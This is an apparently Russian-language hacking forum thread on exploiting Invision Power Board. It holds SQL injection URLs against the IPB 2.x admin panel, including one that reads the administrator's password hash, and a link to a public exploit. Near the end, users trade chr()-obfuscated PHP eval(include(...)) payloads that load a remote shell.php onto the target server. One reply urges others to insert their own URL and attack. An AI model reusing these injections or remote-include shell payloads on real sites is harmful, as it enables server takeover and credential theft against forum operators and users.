• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: Invision Power Board (IPB)

неполучается всеравно
Подмена производиться разными способами(софт аля руки)
Обнови версию, должно помочь. И больше никогда не юзай крякнутые версии прог! Все получается. Просто сессии имеют свойство устаревать, не забываем об этом.
 
Множественные уязвимости в адмнипанели Invision Power Board 2.x
В админпанели Invision Power Board разработчики заботливо оставили целую кучу sql-injection. Пользователь, имеющий доступ в админцентр с ограниченными правами, может просматривать практически все, что ему запрещено.
Пример запроса (2.0.4):
http://site.com/forum/admin.php?adsess=ADM...%20/*&code=view
(просмотр хеша пароля основного администратора)

в общем виде:
http://site.org/forum/admin.php?adsess=ADM...e=edit&f=1'
http://site.org/forum/admin.php?adsess=ADM...form&mid=0'
http://site.org/forum/admin.php?adsess=ADM...users&id=1'
http://site.org/forum/admin.php?adsess=ADM..._edit&id=1'
http://site.org/forum/admin.php?adsess=ADM...dit&gmid=1'
 
Чтож...еще совсем недавно приватный, ныне паблик сплоит IPB <= 2.1.7 + IG 2.0.4
:zns5: Скачать|Download
На DL не сработает, можете и не пытаться ;)
Версия Сишная, если у меня будет время - перепишу на perl.
Кроме того, rapigator сообщил об уязвимости, позволяющей злонамеренному пользователю вынудить пользователя с root-правами выполнить произвольный SQL-запрос через утилиту для работы с SQL в админ-панели. Правда уж слишком много требований существует...
- The database table prefix must be known
- The admin must have access to the SQL Toolbox (any
"root admin")
- The admin must have images and referers turned on in
their browser, and their browser must follow Location
headers (default behaviour for most browsers)
- The admin must view a malicious script as an image
in their browser.
Читать полностью
 
На DL не сработает, можете и не пытаться wink.gif
После установки системы антихака на ДЛ уже ничего не сработает :P
Даже наоборот ложные тревоги появляются :)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Great
Не факт,как говориться баг есть везде,надо только его найти
 
Межсайтовое выполнение сценариев в Invision Power Board
ipb_teaser_mini.jpg

Программа: Invision Power Board 2.1.7, возможно более ранние версии.
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код сценария в контексте сессии целевого пользователя.

Уязвимость существует из-за того, что административный интерфейс позволяет произвести некоторые действия без проверки валидности запроса. Удаленный пользователь может с помощью специально сформированного аватара выполнить произвольный SQL запрос в базе данных приложения когда пользователь с административными привилегиями просматривает специально сформированное изображение в Admin CP.

:zns2: Производитель

Решение: Установите исправление с сайта производителя.

Источник: SecurityLab
 
Решение: Установите исправление с сайта производителя.
Я про это ещё вчера написал тут
 
2006-10-12 Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit (linux)

Rated as : Critical
Код:
...
покусано
....



я в С не шарюсь.. это старая или новая фигня?
[mod][not null:] линк на сплоит был выложен страницу назад[/mod]
 
4утя вопрос когда я ха4у хацкатя форум версии 2.0.4 мне в ехплоите бывает надо вписатя папку ге он находится а форумы 4асто стаят в роот то как надо вписатя фолдер 4тобы было роот
 
Есть вопрос на счёт эксплойта от Wolfa (там где он играется с chr)
Как заменить это я знаю но будет ли оно у меня работать
Если я это заменю на свой сайт который будет находиться на народе.ру
Например http://www.site.narod.ru/shell.php
Код:
($text = 'r57ipbxplhohohoeval(includechr(104).+chr(116).+chr(116).+chr
(112).+chr(58).+chr(47).+chr(47).+chr(119).+chr(119).+chr(119).+chr(46).+chr
(115).+chr(105).+chr(116).+chr(101).+chr(46).+chr(110).+chr(97).+chr(114).+chr
(111).+chr(100).+chr(46).+chr(114).+chr(117).+chr(47).+chr(115).+chr(104).+chr
(101).+chr(108).+chr(108).+chr(46).+chr(112).+chr(104).+chr(112)));
Или будет легче как нить по-другому проинклюдить (знаю один вариант только не хочу писать его так как перл не знаю)
 
Попробуй это (должно быть записано в одну строку)
Код:
eval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).
chr(119).chr(119).chr(46).chr(115).chr(105).chr(116).chr(101).chr(46).chr(110).
chr(97).chr(114).chr(111).chr(100).chr(46).chr(114).chr(117).chr(47).chr(115).
chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112)).chr(59).
exit()); //
 
Код:
Если я это заменю на свой сайт который будет находиться на народе.ру
инклуд
думаю да. интерпретироваться он будет на сервере где висят скрипты форума.

r57ipbxplhohohoeval(include(http://www.site.narod.ru/shell.php)); //
тут свой урл , кприпт и в бой)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх